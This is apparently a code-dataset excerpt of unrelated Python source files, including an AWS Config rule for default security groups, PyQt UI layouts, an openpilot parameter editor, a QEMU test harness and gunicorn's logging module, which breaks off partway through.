metadata
dict | text
stringlengths 60
3.49M
|
---|---|
{
"source": "1T/aws-config-rules",
"score": 2
} |
#### File: python/VPC_DEFAULT_SECURITY_GROUP_BLOCKED/VPC_DEFAULT_SECURITY_GROUP_BLOCKED.py
```python
import json
import datetime
import boto3
import botocore
AWS_CONFIG_CLIENT = boto3.client('config')
DEFAULT_RESOURCE_TYPE = "AWS::EC2::SecurityGroup"
ASSUME_ROLE_MODE = False
def evaluate_compliance(configuration_item, rule_parameters):
if configuration_item['configuration']['groupName'] != 'default':
return 'NOT_APPLICABLE'
if configuration_item['configuration']['ipPermissions']:
return build_evaluation_from_config_item(
configuration_item,
'NON_COMPLIANT',
annotation="This default Security Group has one or more Ingress rules.")
if configuration_item['configuration']['ipPermissionsEgress']:
return build_evaluation_from_config_item(
configuration_item,
'NON_COMPLIANT',
annotation="This default Security Group has one or more Egress rules.")
return 'COMPLIANT'
# USE AS IS
# Helper function to check if rule parameters exist
def parameters_exist(parameters):
return len(parameters) != 0
# Helper function used to validate input
def check_defined(reference, referenceName):
if not reference:
raise Exception('Error: ', referenceName, 'is not defined')
return reference
# Check whether the message is OversizedConfigurationItemChangeNotification or not
def is_oversized_changed_notification(messageType):
check_defined(messageType, 'messageType')
return messageType == 'OversizedConfigurationItemChangeNotification'
# Check whether the message is a ScheduledNotification or not.
def is_scheduled_notification(messageType):
check_defined(messageType, 'messageType')
return messageType == 'ScheduledNotification'
# Get configurationItem using getResourceConfigHistory API
# in case of OversizedConfigurationItemChangeNotification
def get_configuration(resourceType, resourceId, configurationCaptureTime):
result = AWS_CONFIG_CLIENT.get_resource_config_history(
resourceType=resourceType,
resourceId=resourceId,
laterTime=configurationCaptureTime,
limit=1)
configurationItem = result['configurationItems'][0]
return convert_api_configuration(configurationItem)
# Convert from the API model to the original invocation model
def convert_api_configuration(configurationItem):
for k, v in configurationItem.items():
if isinstance(v, datetime.datetime):
configurationItem[k] = str(v)
configurationItem['awsAccountId'] = configurationItem['accountId']
configurationItem['ARN'] = configurationItem['arn']
configurationItem['configurationStateMd5Hash'] = configurationItem['configurationItemMD5Hash']
configurationItem['configurationItemVersion'] = configurationItem['version']
configurationItem['configuration'] = json.loads(configurationItem['configuration'])
if 'relationships' in configurationItem:
for i in range(len(configurationItem['relationships'])):
configurationItem['relationships'][i]['name'] = configurationItem['relationships'][i]['relationshipName']
return configurationItem
# Based on the type of message get the configuration item
# either from configurationItem in the invoking event
# or using the getResourceConfigHistiry API in getConfiguration function.
def get_configuration_item(invokingEvent):
check_defined(invokingEvent, 'invokingEvent')
if is_oversized_changed_notification(invokingEvent['messageType']):
configurationItemSummary = check_defined(invokingEvent['configurationItemSummary'], 'configurationItemSummary')
return get_configuration(configurationItemSummary['resourceType'], configurationItemSummary['resourceId'],
configurationItemSummary['configurationItemCaptureTime'])
elif is_scheduled_notification(invokingEvent['messageType']):
return None
return check_defined(invokingEvent['configurationItem'], 'configurationItem')
# Check whether the resource has been deleted. If it has, then the evaluation is unnecessary.
def is_applicable(configurationItem, event):
check_defined(configurationItem, 'configurationItem')
check_defined(event, 'event')
status = configurationItem['configurationItemStatus']
eventLeftScope = event['eventLeftScope']
if status == 'ResourceDeleted':
print("Resource Deleted, setting Compliance Status to NOT_APPLICABLE.")
return (status == 'OK' or status == 'ResourceDiscovered') and not eventLeftScope
# This gets the client after assuming the Config service role
# either in the same AWS account or cross-account.
def get_client(service, event=None):
if not event:
return boto3.client(service)
credentials = get_assume_role_credentials(event["executionRoleArn"])
return boto3.client(service, aws_access_key_id=credentials['AccessKeyId'],
aws_secret_access_key=credentials['SecretAccessKey'],
aws_session_token=credentials['SessionToken']
)
def get_assume_role_credentials(role_arn):
sts_client = boto3.client('sts')
try:
assume_role_response = sts_client.assume_role(RoleArn=role_arn, RoleSessionName="configLambdaExecution")
return assume_role_response['Credentials']
except botocore.exceptions.ClientError as ex:
# Scrub error message for any internal account info leaks
if 'AccessDenied' in ex.response['Error']['Code']:
ex.response['Error']['Message'] = "AWS Config does not have permission to assume the IAM role."
else:
ex.response['Error']['Message'] = "InternalError"
ex.response['Error']['Code'] = "InternalError"
raise ex
# This generate an evaluation for config
def build_evaluation(resource_id, compliance_type, timestamp, resource_type=DEFAULT_RESOURCE_TYPE, annotation=None):
eval = {}
if annotation:
eval['Annotation'] = annotation
eval['ComplianceResourceType'] = resource_type
eval['ComplianceResourceId'] = resource_id
eval['ComplianceType'] = compliance_type
eval['OrderingTimestamp'] = timestamp
return eval
def build_evaluation_from_config_item(configuration_item, compliance_type, annotation=None):
eval_ci = {}
if annotation:
eval_ci['Annotation'] = annotation
eval_ci['ComplianceResourceType'] = configuration_item['resourceType']
eval_ci['ComplianceResourceId'] = configuration_item['resourceId']
eval_ci['ComplianceType'] = compliance_type
eval_ci['OrderingTimestamp'] = configuration_item['configurationItemCaptureTime']
return eval_ci
# This decorates the lambda_handler in rule_code with the actual PutEvaluation call
def lambda_handler(event, context):
global AWS_CONFIG_CLIENT
if ASSUME_ROLE_MODE:
AWS_CONFIG_CLIENT = get_client('config', event)
evaluations = []
# print(event)
check_defined(event, 'event')
invokingEvent = json.loads(event['invokingEvent'])
rule_parameters = {}
if 'ruleParameters' in event:
rule_parameters = json.loads(event['ruleParameters'])
configuration_item = get_configuration_item(invokingEvent)
if is_applicable(configuration_item, event):
compliance_result = evaluate_compliance(configuration_item, rule_parameters)
else:
compliance_result = "NOT_APPLICABLE"
if isinstance(compliance_result, str):
evaluations.append(build_evaluation_from_config_item(configuration_item, compliance_result))
elif isinstance(compliance_result, list):
for evaluation in compliance_result:
missing_fields = False
for field in ('ComplianceResourceType', 'ComplianceResourceId', 'ComplianceType', 'OrderingTimestamp'):
if field not in evaluation:
print("Missing " + field + " from custom evaluation.")
missing_fields = True
if not missing_fields:
evaluations.append(evaluation)
elif isinstance(compliance_result, dict):
missing_fields = False
for field in ('ComplianceResourceType', 'ComplianceResourceId', 'ComplianceType', 'OrderingTimestamp'):
if field not in compliance_result:
print("Missing " + field + " from custom evaluation.")
missing_fields = True
if not missing_fields:
evaluations.append(compliance_result)
else:
evaluations.append(build_evaluation_from_config_item(configuration_item, 'NOT_APPLICABLE'))
# Put together the request that reports the evaluation status
resultToken = event['resultToken']
testMode = False
if resultToken == 'TEST<PASSWORD>':
# Used solely for RDK test to skip actual put_evaluation API call
testMode = True
# Invoke the Config API to report the result of the evaluation
AWS_CONFIG_CLIENT.put_evaluations(Evaluations=evaluations, ResultToken=resultToken, TestMode=testMode)
# Used solely for RDK test to be able to test Lambda function
return evaluations
``` |
{
"source": "1TaylanOzturk/whatsapp-message-scheduler",
"score": 3
} |
#### File: src/UIs/design_of_configuration_window.py
```python
from PyQt5 import QtCore, QtWidgets
class UI(object):
def setupUi(self, GUI):
GUI.setObjectName("GUI")
GUI.setEnabled(True)
GUI.resize(497, 447)
GUI.setAutoFillBackground(False)
self.phoneNumber = QtWidgets.QLineEdit(GUI)
self.phoneNumber.setGeometry(QtCore.QRect(90, 60, 341, 28))
self.phoneNumber.setObjectName("phoneNumber")
self.message = QtWidgets.QPlainTextEdit(GUI)
self.message.setGeometry(QtCore.QRect(90, 100, 341, 60))
self.message.setObjectName("message")
self.label = QtWidgets.QLabel(GUI)
self.label.setGeometry(QtCore.QRect(210, 30, 100, 16))
self.label.setStyleSheet("QLabel {\n"
" font-size: 20px;\n"
"}")
self.label.setObjectName("label")
self.hour = QtWidgets.QLineEdit(GUI)
self.hour.setGeometry(QtCore.QRect(90, 240, 341, 28))
self.hour.setObjectName("hour")
self.label_2 = QtWidgets.QLabel(GUI)
self.label_2.setGeometry(QtCore.QRect(180, 210, 200, 25))
self.label_2.setStyleSheet("QLabel {\n"
" font-size: 20px;\n"
"}")
self.label_2.setObjectName("label_2")
self.minute = QtWidgets.QLineEdit(GUI)
self.minute.setGeometry(QtCore.QRect(90, 280, 341, 28))
self.minute.setObjectName("minute")
self.btn_save = QtWidgets.QPushButton(GUI)
self.btn_save.setGeometry(QtCore.QRect(70, 380, 131, 28))
self.btn_save.setObjectName("btn_save")
self.btn_edit = QtWidgets.QPushButton(GUI)
self.btn_edit.setGeometry(QtCore.QRect(300, 380, 131, 28))
self.btn_edit.setObjectName("btn_edit")
self.retranslateUi(GUI)
QtCore.QMetaObject.connectSlotsByName(GUI)
def retranslateUi(self, GUI):
_translate = QtCore.QCoreApplication.translate
GUI.setWindowTitle(_translate("GUI", "GUI"))
self.phoneNumber.setPlaceholderText(_translate("GUI", " Phone Number"))
self.message.setPlaceholderText(_translate("GUI", " Message"))
self.label.setText(_translate("GUI", "User Datas"))
self.minute.setPlaceholderText(_translate("GUI", " Minute"))
self.label_2.setText(_translate("GUI", "Scheduling Datas"))
self.hour.setPlaceholderText(_translate("GUI", " Hour"))
self.btn_save.setText(_translate("GUI", "Save"))
self.btn_edit.setText(_translate("GUI", "Edit"))
```
#### File: src/UIs/design_of_editing_window.py
```python
from PyQt5 import QtCore, QtWidgets
class UI(object):
def setupUi(self, GUI):
GUI.setObjectName("GUI")
GUI.resize(400, 432)
self.plainTextEdit = QtWidgets.QPlainTextEdit(GUI)
self.plainTextEdit.setGeometry(QtCore.QRect(0, 10, 401, 291))
self.plainTextEdit.setObjectName("plainTextEdit")
self.btn_save = QtWidgets.QPushButton(GUI)
self.btn_save.setGeometry(QtCore.QRect(150, 340, 90, 28))
self.btn_save.setObjectName("btn_save")
self.btn_reset = QtWidgets.QPushButton(GUI)
self.btn_reset.setGeometry(QtCore.QRect(150, 380, 90, 28))
self.retranslateUi(GUI)
QtCore.QMetaObject.connectSlotsByName(GUI)
def retranslateUi(self, GUI):
_translate = QtCore.QCoreApplication.translate
GUI.setWindowTitle(_translate("GUI", "GUI"))
self.btn_save.setText(_translate("GUI", "Save"))
self.btn_reset.setText(_translate("GUI", "Reset"))
``` |
{
"source": "1technophile/platform-espressif32",
"score": 2
} |
#### File: builder/frameworks/_embed_files.py
```python
import shutil
from os import SEEK_CUR, SEEK_END, makedirs
from os.path import basename, isfile, isdir, join
from SCons.Script import Builder
from platformio.util import cd
Import("env")
#
# Embedded files helpers
#
def prepare_files(files):
if not files:
return
fixed_files = []
build_dir = env.subst("$BUILD_DIR")
if not isdir(build_dir):
makedirs(build_dir)
for f in files:
fixed_file = join(build_dir, basename(f))
shutil.copy(env.subst(f), fixed_file)
with open(fixed_file, "rb+") as fp:
fp.seek(-1, SEEK_END)
if fp.read(1) != '\0':
fp.seek(0, SEEK_CUR)
fp.write(b'\0')
fixed_files.append(fixed_file)
return fixed_files
def extract_files(cppdefines, files_type):
for define in cppdefines:
if files_type not in define:
continue
if not isinstance(define, tuple):
print("Warning! %s macro cannot be empty!" % files_type)
return []
with cd(env.subst("$PROJECT_DIR")):
value = define[1]
if not isinstance(value, str):
print("Warning! %s macro must contain "
"a list of files separated by ':'" % files_type)
return []
result = []
for f in value.split(':'):
if not isfile(f):
print("Warning! Could not find file %s" % f)
continue
result.append(join("$PROJECT_DIR", f))
return result
def remove_config_define(cppdefines, files_type):
for define in cppdefines:
if files_type in define:
env.ProcessUnFlags("-D%s" % "=".join(str(d) for d in define))
return
def embed_files(files):
for f in files:
filename = basename(f) + ".txt.o"
file_target = env.TxtToBin(join("$BUILD_DIR", filename), f)
env.Depends("$PIOMAINPROG", file_target)
env.Append(PIOBUILDFILES=[env.File(join("$BUILD_DIR", filename))])
env.Append(
BUILDERS=dict(
TxtToBin=Builder(
action=env.VerboseAction(" ".join([
"xtensa-esp32-elf-objcopy",
"--input-target", "binary",
"--output-target", "elf32-xtensa-le",
"--binary-architecture", "xtensa",
"--rename-section", ".data=.rodata.embedded",
"$SOURCE", "$TARGET"
]), "Converting $TARGET"),
suffix=".txt.o"))
)
flags = env.get("CPPDEFINES")
for component_files in ("COMPONENT_EMBED_TXTFILES", "COMPONENT_EMBED_FILES"):
if component_files not in env.Flatten(flags):
continue
files = extract_files(flags, component_files)
if component_files == "COMPONENT_EMBED_TXTFILES":
files = prepare_files(files)
embed_files(files)
remove_config_define(flags, component_files)
``` |
{
"source": "1tgr/rust-os",
"score": 2
} |
#### File: rust-os/src/test.py
```python
import os
import pexpect
import sys
import subprocess
import tempfile
from argparse import ArgumentParser, REMAINDER
from pexpect import fdpexpect
from subprocess import Popen
from vncdotool import api
def main():
parser = ArgumentParser()
parser.add_argument('--screenshot', action='store_true', default=False)
parser.add_argument('qemu_cmd', nargs=REMAINDER)
args = parser.parse_args()
fifo_name = os.path.join(tempfile.mkdtemp(), 'fifo')
os.mkfifo(fifo_name)
try:
child_args = args.qemu_cmd + ['-serial', 'pipe:' + fifo_name, '-vnc', ':0']
print('> %s' % subprocess.list2cmdline(child_args))
with Popen(child_args) as child_proc:
print('[test.py] Started process %d' % child_proc.pid)
try:
with open(fifo_name, 'rb') as fifo:
child = fdpexpect.fdspawn(fifo, encoding='utf8', logfile=sys.stdout, timeout=10)
result = child.expect([r'\[kernel\] end kmain|System ready', r'\[kernel::unwind\] (.*)', pexpect.TIMEOUT])
if result == 0:
print('[test.py] Success')
elif result == 1:
(message,) = child.match.groups()
print('[test.py] Failed: %s' % message)
elif result == 2:
print('[test.py] Timed out')
finally:
if args.screenshot:
client = api.connect('localhost:0', password=None)
filename = 'screenshot.png'
print('[test.py] Saving screenshot to %s' % filename)
prev_screenshot_bytes = None
if result == 0:
try:
with open(filename, 'rb') as f:
prev_screenshot_bytes = f.read()
except:
pass
client.captureScreen(filename)
if prev_screenshot_bytes is not None:
with open(filename, 'rb') as f:
screenshot_bytes = f.read()
if prev_screenshot_bytes != screenshot_bytes:
result = 3
print('[test.py] Stopping process %d' % child_proc.pid)
child_proc.kill()
print('[test.py] Waiting for process %d to exit... ' % child_proc.pid, end='', flush=True)
child_proc.wait()
print('done')
finally:
os.unlink(fifo_name)
return result
if __name__ == '__main__':
result = main()
exit(result)
``` |
{
"source": "1Thamer/openpilot0.6.6",
"score": 3
} |
#### File: 1Thamer/openpilot0.6.6/op_edit.py
```python
from common.op_params import opParams
import time
import ast
class opEdit: # use by running `python /data/openpilot/op_edit.py`
def __init__(self):
self.op_params = opParams()
self.params = None
print('Welcome to the opParams command line editor!')
print('Here are your parameters:\n')
self.run_loop()
def run_loop(self):
print('Welcome to the opParams command line editor!')
print('Here are your parameters:\n')
while True:
self.params = self.op_params.get()
values_list = [self.params[i] if len(str(self.params[i])) < 20 else '{} ... {}'.format(str(self.params[i])[:30], str(self.params[i])[-15:]) for i in self.params]
to_print = ['{}. {}: {} (type: {})'.format(idx + 1, i, values_list[idx], str(type(self.params[i])).split("'")[1]) for idx, i in enumerate(self.params)]
to_print.append('{}. Add new parameter!'.format(len(self.params) + 1))
to_print.append('{}. Delete parameter!'.format(len(self.params) + 2))
print('\n'.join(to_print))
print('\nChoose a parameter to explore (by integer index): ')
choice = input('>> ')
parsed, choice = self.parse_choice(choice)
if parsed == 'continue':
continue
elif parsed == 'add':
if self.add_parameter() == 'error':
return
elif parsed == 'change':
if self.change_parameter(choice) == 'error':
return
elif parsed == 'delete':
if self.delete_parameter() == 'error':
return
else:
return
def parse_choice(self, choice):
if choice.isdigit():
choice = int(choice)
else:
print('Not an integer, exiting!')
return 'error', choice
if choice not in range(1, len(self.params) + 3): # three for add/delete parameter
print('Not in range!\n', flush=True)
time.sleep(1.5)
return 'continue', choice
if choice == len(self.params) + 1: # add new parameter
return 'add', choice
if choice == len(self.params) + 2: # delete parameter
return 'delete', choice
return 'change', choice
def change_parameter(self, choice):
chosen_key = list(self.params)[choice - 1]
extra_info = False
if chosen_key in self.op_params.default_params:
extra_info = True
param_allowed_types = self.op_params.default_params[chosen_key]['allowed_types']
param_description = self.op_params.default_params[chosen_key]['description']
old_value = self.params[chosen_key]
print('Chosen parameter: {}'.format(chosen_key))
print('Current value: {} (type: {})'.format(old_value, str(type(old_value)).split("'")[1]))
if extra_info:
print('\nDescription: {}'.format(param_description))
print('Allowed types: {}\n'.format(', '.join([str(i).split("'")[1] for i in param_allowed_types])))
print('Enter your new value:')
new_value = input('>> ')
if len(new_value) == 0:
print('Entered value cannot be empty!')
return 'error'
status, new_value = self.parse_input(new_value)
if not status:
print('Cannot parse input, exiting!')
return 'error'
if extra_info and not any([isinstance(new_value, typ) for typ in param_allowed_types]):
print('The type of data you entered ({}) is not allowed with this parameter!\n'.format(str(type(new_value)).split("'")[1]))
time.sleep(1.5)
return
print('\nOld value: {} (type: {})'.format(old_value, str(type(old_value)).split("'")[1]))
print('New value: {} (type: {})'.format(new_value, str(type(new_value)).split("'")[1]))
print('Do you want to save this?')
choice = input('[Y/n]: ').lower()
if choice == 'y':
self.op_params.put(chosen_key, new_value)
print('\nSaved! Anything else?')
choice = input('[Y/n]: ').lower()
if choice == 'n':
return
else:
print('\nNot saved!\n', flush=True)
time.sleep(1.5)
def parse_input(self, dat):
try:
dat = ast.literal_eval(dat)
except:
try:
dat = ast.literal_eval('"{}"'.format(dat))
except ValueError:
return False, dat
return True, dat
def delete_parameter(self):
print('Enter the name of the parameter to delete:')
key = input('>> ')
status, key = self.parse_input(key)
if not status:
print('Cannot parse input, exiting!')
return 'error'
if not isinstance(key, str):
print('Input must be a string!')
return 'error'
if key not in self.params:
print("Parameter doesn't exist!")
return 'error'
value = self.params.get(key)
print('Parameter name: {}'.format(key))
print('Parameter value: {} (type: {})'.format(value, str(type(value)).split("'")[1]))
print('Do you want to delete this?')
choice = input('[Y/n]: ').lower()
if choice == 'y':
self.op_params.delete(key)
print('\nDeleted! Anything else?')
choice = input('[Y/n]: ').lower()
if choice == 'n':
return
else:
print('\nNot saved!\n', flush=True)
time.sleep(1.5)
def add_parameter(self):
print('Type the name of your new parameter:')
key = input('>> ')
if len(key) == 0:
print('Entered key cannot be empty!')
return 'error'
status, key = self.parse_input(key)
if not status:
print('Cannot parse input, exiting!')
return 'error'
if not isinstance(key, str):
print('Input must be a string!')
return 'error'
print("Enter the data you'd like to save with this parameter:")
value = input('>> ')
status, value = self.parse_input(value)
if not status:
print('Cannot parse input, exiting!')
return 'error'
print('Parameter name: {}'.format(key))
print('Parameter value: {} (type: {})'.format(value, str(type(value)).split("'")[1]))
print('Do you want to save this?')
choice = input('[Y/n]: ').lower()
if choice == 'y':
self.op_params.put(key, value)
print('\nSaved! Anything else?')
choice = input('[Y/n]: ').lower()
if choice == 'n':
return
else:
print('\nNot saved!\n', flush=True)
time.sleep(1.5)
opEdit()
``` |
{
"source": "1T/InventoryCalculator",
"score": 2
} |
#### File: core/storages/s3_storage.py
```python
import boto3
from botocore.exceptions import ClientError
from inventorycalculator.errors import S3StorageError
from OneTicketLogging import elasticsearch_logger
_logger = elasticsearch_logger(__name__)
class S3Storage:
def __init__(self, bucket_name: str):
self._bucket_name = bucket_name
self._client = boto3.client('s3')
def upload(self, key: str, data: str):
try:
self._client.put_object(
Body=data.encode(),
Key=key,
Bucket=self._bucket_name
)
except ClientError as e:
_logger.error(e)
raise S3StorageError('Unable to upload given data')
def get(self, key: str) -> str:
try:
return self._client.get_object(
Key=key,
Bucket=self._bucket_name
)['Body'].read().decode('utf-8')
except ClientError as e:
_logger.error(e)
raise S3StorageError(f'Resource not exists by given key:{key}')
```
#### File: core/workers/aws_lambda.py
```python
import boto3
from json import dumps
from typing import Dict
from botocore.exceptions import ClientError
from inventorycalculator.errors import InvokeLambdaError
from OneTicketLogging import elasticsearch_logger
_logger = elasticsearch_logger(__name__)
class AwsLambda:
def __init__(self, name: str, **kwargs):
self._name = name
self._client = boto3.client('lambda')
self._invocation_type = kwargs.get('InvocationType', 'Event')
def async_invoke(self, payload: Dict):
try:
self._client.invoke(
FunctionName=self._name,
Payload=dumps(payload),
InvocationType=self._invocation_type
)
except ClientError as exc:
_logger.error(exc)
raise InvokeLambdaError(f'{self._name} invocation failed: {exc}')
``` |
{
"source": "1T/python-filterparams",
"score": 3
} |
#### File: src/filterparams/util.py
```python
import itertools
from werkzeug.datastructures import MultiDict
def to_multidict(value):
if not isinstance(value, MultiDict) and isinstance(value, dict):
value = _dict_to_multidict(value)
return value
def flatten(to_flatten_list):
if not isinstance(to_flatten_list, (list, tuple)):
return to_flatten_list
result = []
for list_item in to_flatten_list:
if isinstance(list_item, (list, tuple)):
result.extend(flatten(item) for item in list_item)
else:
result.append(list_item)
return result
def create_key_value_pairs(dictionary, key):
def get_values(key):
if hasattr(dictionary, 'getall'):
data = dictionary.getall(key)
else:
data = [dictionary.get(key)]
return flatten(data)
values = get_values(key)
return zip([key] * len(values), values)
def _dict_to_multidict(value):
return MultiDict(
itertools.chain.from_iterable(
create_key_value_pairs(value, key)
for key in value.keys()
)
)
```
#### File: test/filterparams_tests/base_parser_test.py
```python
from unittest import TestCase
class BaseParserTest(TestCase):
def setUp(self):
self.params = {}
def _add_param(self, name, **kwargs):
items = [name]
if 'filter' in kwargs:
items.append(kwargs['filter'])
if 'alias' in kwargs:
items.append(kwargs['alias'])
key = 'filter[param]%s' % (
''.join('[%s]' % item for item in items)
)
self.params[key] = kwargs.get('value', None)
def _add_binding(self, binding):
self.params['filter[binding]'] = binding
```
#### File: test/filterparams_tests/test_safe_parser.py
```python
from filterparams import build_parser
from filterparams_tests.base_parser_test import (
BaseParserTest
)
class TestSafeParser(BaseParserTest):
def setUp(self):
self.filters = []
self.default_filter = None
super(TestSafeParser, self).setUp()
@property
def parser(self):
return build_parser(
self.filters,
self.default_filter
)
@property
def query(self):
return self.parser(self.params)
def test_filter_not_present(self):
self._add_param('test', filter='eq')
with self.assertRaises(ValueError):
self.query # pylint: disable=pointless-statement
def test_filter_present(self):
self.filters.append('eq')
self._add_param('test', filter='eq')
self.assertTrue(self.query.has_param('test'))
def test_default_filter(self):
self.filters.append('eq')
self.default_filter = 'eq'
self._add_param('test')
param = self.query.get_param('test')
self.assertEqual(param.filter, 'eq')
``` |
{
"source": "1tracy/3.3.1.1-flask-blog",
"score": 2
} |
#### File: site-packages/gunicorn/glogging.py
```python
import base64
import binascii
import time
import logging
logging.Logger.manager.emittedNoHandlerWarning = 1
from logging.config import dictConfig
from logging.config import fileConfig
import os
import socket
import sys
import threading
import traceback
from gunicorn import util
# syslog facility codes
SYSLOG_FACILITIES = {
"auth": 4,
"authpriv": 10,
"cron": 9,
"daemon": 3,
"ftp": 11,
"kern": 0,
"lpr": 6,
"mail": 2,
"news": 7,
"security": 4, # DEPRECATED
"syslog": 5,
"user": 1,
"uucp": 8,
"local0": 16,
"local1": 17,
"local2": 18,
"local3": 19,
"local4": 20,
"local5": 21,
"local6": 22,
"local7": 23,
}
CONFIG_DEFAULTS = dict(
version=1,
disable_existing_loggers=False,
root={"level": "INFO", "handlers": ["console"]},
loggers={
"gunicorn.error": {
"level": "INFO",
"handlers": ["error_console"],
"propagate": True,
"qualname": "gunicorn.error",
},
"gunicorn.access": {
"level": "INFO",
"handlers": ["console"],
"propagate": True,
"qualname": "gunicorn.access",
},
},
handlers={
"console": {
"class": "logging.StreamHandler",
"formatter": "generic",
"stream": "ext://sys.stdout",
},
"error_console": {
"class": "logging.StreamHandler",
"formatter": "generic",
"stream": "ext://sys.stderr",
},
},
formatters={
"generic": {
"format": "%(asctime)s [%(process)d] [%(levelname)s] %(message)s",
"datefmt": "[%Y-%m-%d %H:%M:%S %z]",
"class": "logging.Formatter",
}
},
)
def loggers():
"""get list of all loggers"""
root = logging.root
existing = root.manager.loggerDict.keys()
return [logging.getLogger(name) for name in existing]
class SafeAtoms(dict):
def __init__(self, atoms):
dict.__init__(self)
for key, value in atoms.items():
if isinstance(value, str):
self[key] = value.replace('"', '\\"')
else:
self[key] = value
def __getitem__(self, k):
if k.startswith("{"):
kl = k.lower()
if kl in self:
return super().__getitem__(kl)
else:
return "-"
if k in self:
return super().__getitem__(k)
else:
return "-"
def parse_syslog_address(addr):
# unix domain socket type depends on backend
# SysLogHandler will try both when given None
if addr.startswith("unix://"):
sock_type = None
# set socket type only if explicitly requested
parts = addr.split("#", 1)
if len(parts) == 2:
addr = parts[0]
if parts[1] == "dgram":
sock_type = socket.SOCK_DGRAM
return (sock_type, addr.split("unix://")[1])
if addr.startswith("udp://"):
addr = addr.split("udp://")[1]
socktype = socket.SOCK_DGRAM
elif addr.startswith("tcp://"):
addr = addr.split("tcp://")[1]
socktype = socket.SOCK_STREAM
else:
raise RuntimeError("invalid syslog address")
if "[" in addr and "]" in addr:
host = addr.split("]")[0][1:].lower()
elif ":" in addr:
host = addr.split(":")[0].lower()
elif addr == "":
host = "localhost"
else:
host = addr.lower()
addr = addr.split("]")[-1]
if ":" in addr:
port = addr.split(":", 1)[1]
if not port.isdigit():
raise RuntimeError("%r is not a valid port number." % port)
port = int(port)
else:
port = 514
return (socktype, (host, port))
class Logger(object):
LOG_LEVELS = {
"critical": logging.CRITICAL,
"error": logging.ERROR,
"warning": logging.WARNING,
"info": logging.INFO,
"debug": logging.DEBUG,
}
loglevel = logging.INFO
error_fmt = r"%(asctime)s [%(process)d] [%(levelname)s] %(message)s"
datefmt = r"[%Y-%m-%d %H:%M:%S %z]"
access_fmt = "%(message)s"
syslog_fmt = "[%(process)d] %(message)s"
atoms_wrapper_class = SafeAtoms
def __init__(self, cfg):
self.error_log = logging.getLogger("gunicorn.error")
self.error_log.propagate = False
self.access_log = logging.getLogger("gunicorn.access")
self.access_log.propagate = False
self.error_handlers = []
self.access_handlers = []
self.logfile = None
self.lock = threading.Lock()
self.cfg = cfg
self.setup(cfg)
def setup(self, cfg):
self.loglevel = self.LOG_LEVELS.get(cfg.loglevel.lower(), logging.INFO)
self.error_log.setLevel(self.loglevel)
self.access_log.setLevel(logging.INFO)
# set gunicorn.error handler
if self.cfg.capture_output and cfg.errorlog != "-":
for stream in sys.stdout, sys.stderr:
stream.flush()
self.logfile = open(cfg.errorlog, "a+")
os.dup2(self.logfile.fileno(), sys.stdout.fileno())
os.dup2(self.logfile.fileno(), sys.stderr.fileno())
self._set_handler(
self.error_log,
cfg.errorlog,
logging.Formatter(self.error_fmt, self.datefmt),
)
# set gunicorn.access handler
if cfg.accesslog is not None:
self._set_handler(
self.access_log,
cfg.accesslog,
fmt=logging.Formatter(self.access_fmt),
stream=sys.stdout,
)
# set syslog handler
if cfg.syslog:
self._set_syslog_handler(self.error_log, cfg, self.syslog_fmt, "error")
if not cfg.disable_redirect_access_to_syslog:
self._set_syslog_handler(
self.access_log, cfg, self.syslog_fmt, "access"
)
if cfg.logconfig_dict:
config = CONFIG_DEFAULTS.copy()
config.update(cfg.logconfig_dict)
try:
dictConfig(config)
except (AttributeError, ImportError, ValueError, TypeError) as exc:
raise RuntimeError(str(exc))
elif cfg.logconfig:
if os.path.exists(cfg.logconfig):
defaults = CONFIG_DEFAULTS.copy()
defaults["__file__"] = cfg.logconfig
defaults["here"] = os.path.dirname(cfg.logconfig)
fileConfig(
cfg.logconfig, defaults=defaults, disable_existing_loggers=False
)
else:
msg = "Error: log config '%s' not found"
raise RuntimeError(msg % cfg.logconfig)
def critical(self, msg, *args, **kwargs):
self.error_log.critical(msg, *args, **kwargs)
def error(self, msg, *args, **kwargs):
self.error_log.error(msg, *args, **kwargs)
def warning(self, msg, *args, **kwargs):
self.error_log.warning(msg, *args, **kwargs)
def info(self, msg, *args, **kwargs):
self.error_log.info(msg, *args, **kwargs)
def debug(self, msg, *args, **kwargs):
self.error_log.debug(msg, *args, **kwargs)
def exception(self, msg, *args, **kwargs):
self.error_log.exception(msg, *args, **kwargs)
def log(self, lvl, msg, *args, **kwargs):
if isinstance(lvl, str):
lvl = self.LOG_LEVELS.get(lvl.lower(), logging.INFO)
self.error_log.log(lvl, msg, *args, **kwargs)
def atoms(self, resp, req, environ, request_time):
"""Gets atoms for log formating."""
status = resp.status
if isinstance(status, str):
status = status.split(None, 1)[0]
atoms = {
"h": environ.get("REMOTE_ADDR", "-"),
"l": "-",
"u": self._get_user(environ) or "-",
"t": self.now(),
"r": "%s %s %s"
% (
environ["REQUEST_METHOD"],
environ["RAW_URI"],
environ["SERVER_PROTOCOL"],
),
"s": status,
"m": environ.get("REQUEST_METHOD"),
"U": environ.get("PATH_INFO"),
"q": environ.get("QUERY_STRING"),
"H": environ.get("SERVER_PROTOCOL"),
"b": getattr(resp, "sent", None) is not None and str(resp.sent) or "-",
"B": getattr(resp, "sent", None),
"f": environ.get("HTTP_REFERER", "-"),
"a": environ.get("HTTP_USER_AGENT", "-"),
"T": request_time.seconds,
"D": (request_time.seconds * 1000000) + request_time.microseconds,
"L": "%d.%06d" % (request_time.seconds, request_time.microseconds),
"p": "<%s>" % os.getpid(),
}
# add request headers
if hasattr(req, "headers"):
req_headers = req.headers
else:
req_headers = req
if hasattr(req_headers, "items"):
req_headers = req_headers.items()
atoms.update({"{%s}i" % k.lower(): v for k, v in req_headers})
resp_headers = resp.headers
if hasattr(resp_headers, "items"):
resp_headers = resp_headers.items()
# add response headers
atoms.update({"{%s}o" % k.lower(): v for k, v in resp_headers})
# add environ variables
environ_variables = environ.items()
atoms.update({"{%s}e" % k.lower(): v for k, v in environ_variables})
return atoms
def access(self, resp, req, environ, request_time):
"""See http://httpd.apache.org/docs/2.0/logs.html#combined
for format details
"""
if not (
self.cfg.accesslog
or self.cfg.logconfig
or self.cfg.logconfig_dict
or (self.cfg.syslog and not self.cfg.disable_redirect_access_to_syslog)
):
return
# wrap atoms:
# - make sure atoms will be test case insensitively
# - if atom doesn't exist replace it by '-'
safe_atoms = self.atoms_wrapper_class(
self.atoms(resp, req, environ, request_time)
)
try:
self.access_log.info(self.cfg.access_log_format, safe_atoms)
except:
self.error(traceback.format_exc())
def now(self):
"""return date in Apache Common Log Format"""
return time.strftime("[%d/%b/%Y:%H:%M:%S %z]")
def reopen_files(self):
if self.cfg.capture_output and self.cfg.errorlog != "-":
for stream in sys.stdout, sys.stderr:
stream.flush()
